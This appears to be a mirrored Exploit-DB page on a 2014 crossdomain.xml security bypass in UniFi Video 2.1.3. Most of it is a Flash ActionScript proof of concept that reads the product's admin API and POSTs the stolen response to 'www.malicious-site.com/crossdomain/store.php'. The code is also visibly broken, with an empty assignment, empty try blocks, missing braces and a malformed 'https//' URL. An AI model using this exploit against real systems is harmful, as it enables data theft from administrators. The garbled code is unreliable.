Ubiquiti Networks UniFi Video Default – ‘crossdomain.xml’ Security Bypass

  • 作者: Seth Art
    日期: 2014-07-23
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/39268/
  • source: https://www.securityfocus.com/bid/68866/info
    UniFi Video is prone to a security-bypass vulnerability.
    An authenticated attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.
    UniFi Video 2.1.3 is vulnerable; other versions may also be affected. 
    // Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
    // POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
    // POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit)
    package {
     import flash.display.Sprite;
     import flash.events.*;
     import flash.net.URLRequestMethod;
     import flash.net.URLRequest;
     import flash.net.URLLoader;
     import flash.net.URLRequestHeader;
     public class XDomainXploit3 extends Sprite {
    public function XDomainXploit3() {
     // Target URL from where the data is to be retrieved
     var readFrom:String = "https//www.example.com:7443/api/2.0/admin";
     var header:URLRequestHeader = new URLRequestHeader("Content-Type",
    "text/plain; charset=UTF-8");
     var readRequest:URLRequest = new URLRequest(readFrom);
     readRequest.method = URLRequestMethod.POST
     readRequest.data =
     var getLoader:URLLoader = new URLLoader();
     getLoader.addEventListener(Event.COMPLETE, eventHandler);
     try {
     } catch (error:Error) {
    trace("Error loading URL: " + error);
    private function eventHandler(event:Event):void {
     // URL to which retrieved data is to be sent
     var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php"
     var sendRequest:URLRequest = new URLRequest(sendTo);
     sendRequest.method = URLRequestMethod.POST;
     sendRequest.data = event.target.data;
     var sendLoader:URLLoader = new URLLoader();
     try {
     } catch (error:Error) {
    trace("Error loading URL: " + error);